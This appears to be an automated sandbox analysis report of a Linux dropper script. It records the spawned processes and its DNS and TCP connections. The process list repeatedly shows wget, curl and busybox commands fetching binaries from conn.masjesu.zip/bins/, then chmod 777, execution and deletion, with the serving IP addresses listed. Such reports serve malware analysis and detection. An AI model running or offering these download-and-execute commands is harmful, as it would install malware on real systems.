File opened for modification /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /usr/bin/curl N/A
File opened for modification /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /usr/bin/curl N/A
File opened for modification /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /usr/bin/curl N/A
File opened for modification /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /usr/bin/curl N/A
File opened for modification /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /usr/bin/curl N/A
File opened for modification /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /usr/bin/curl N/A
File opened for modification /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /usr/bin/curl N/A
File opened for modification /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J /usr/bin/curl N/A
File opened for modification /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /usr/bin/curl N/A

Processes

/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh

[/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/chmod

[chmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27

[./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/rm

[rm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/chmod

[chmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB

[./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/rm

[rm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/chmod

[chmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl

[./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/rm

[rm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/chmod

[chmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J

[./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/rm

[rm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/chmod

[chmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE

[./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/rm

[rm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/chmod

[chmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj

[./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/rm

[rm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/chmod

[chmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg

[./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/rm

[rm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/chmod

[chmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17

[./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/rm

[rm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/chmod

[chmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq

[./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/rm

[rm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/chmod

[chmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8

[./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/rm

[rm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/chmod

[chmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr

[./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/rm

[rm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/chmod

[chmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ

[./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/rm

[rm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/chmod

[chmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX

[./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/rm

[rm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/chmod

[chmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08

[./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/rm

[rm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/chmod

[chmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8

[./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/bin/rm

[rm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/chmod

[chmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj

[./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/bin/rm

[rm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/chmod

[chmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg

[./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/bin/rm

[rm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/chmod

[chmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17

[./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/bin/rm

[rm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/chmod

[chmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq

[./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/bin/rm

[rm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/chmod

[chmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr

[./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/bin/rm

[rm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/chmod

[chmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ

[./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/bin/rm

[rm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/chmod

[chmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX

[./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/bin/rm

[rm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/chmod

[chmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08

[./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/bin/rm

[rm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/chmod

[chmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE

[./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/bin/rm

[rm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/chmod

[chmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27

[./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/bin/rm

[rm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/chmod

[chmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB

[./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/bin/rm

[rm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/chmod

[chmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl

[./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/bin/rm

[rm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/chmod

[chmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J

[./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

/bin/rm

[rm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
